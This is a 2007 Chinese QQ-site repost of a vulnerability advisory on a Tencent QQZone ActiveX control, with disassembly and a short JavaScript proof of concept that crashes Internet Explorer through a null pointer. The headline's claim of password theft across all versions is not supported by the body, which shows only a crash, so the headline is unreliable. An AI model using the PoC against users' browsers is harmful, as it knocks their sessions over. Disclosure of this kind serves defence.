首页  QQ头像  QQ号码  QQ游戏  QQ堂  QQ软件  QQ空间  QQ宠物  QQ彩信  免费激情小电影  
返回QQ乐园首页 ·返回首页
·联系我们
·收藏本站
  导航: QQ资讯    QQ使用技巧    QQ号码安全    QQ软件下载    QQ聊天宝典    QQ宠物挂机    QQ游戏    QQ空间代码    QQ吉凶查询
你的位置:首页 >>> QQ安全 >>> 正文
 
QQ2007新出漏洞 可以盗取QQ密码 涉及所有版本
作者: QQ在线  来源: WWW.QQOL.ORG  时间: 2007-3-4 22:57:02  浏览:   收藏本文 


幻影旅团的axis发现了一个QQZone的activex漏洞.在使用WebCtrl.
方法时,将引用一个空指针,造成ie崩溃.由于该activex没有标记为safe,故会出现安全提示.

细节:

在TencentQQQZoneTWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用

051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]
051024C8 6A 00 PUSH 0
051024CA 6A 00 PUSH 0
051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]
051024D2 6A 00 PUSH 0
051024D4 6A 00 PUSH 0
051024D6 52 PUSH EDX
051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]

时EAX为null

幻影旅团将对此发布一个POC代码,请勿将此作为非法用途

POC:
>
var qqkcuf = new ActiveXObject("WebCtrl.TWebControl.1");
var arg1 = 0;

qqkcuf.Navigate(arg1);

建议:

禁止ie执行activex

厂商补丁:
目前厂商没有发布补丁
[ 更多QQ资源请访问 『QQ在线』 WWW.QQOL.ORG ]
 
·上篇文章:清除隐藏文件中的QQ病毒
·下篇文章:QQ盗号又出新招 不改密码只偷QQ币
站长推荐
推荐文章
·QQ表情:来自韩国的海胆君
·爆涨的牛市!股票超搞笑QQ表
·2007年6月最新刷免费QQ会员
·六一儿童节QQ表情(祝所有的
·2007年5月最新免费的QQ秀!
·玩转QQ宠物:QQ宠物基本喂养
热门文章
将『QQ在线』设为首页 | 收藏『QQ在线』 | 关于我们 | 联系我们 | 网站地图
Copyright © 2005 - 2006 『QQ在线』资讯网 All rights reserved.
本站所有资源均来自网络 版权归原作者所有 欢迎任何建议、批评和鼓励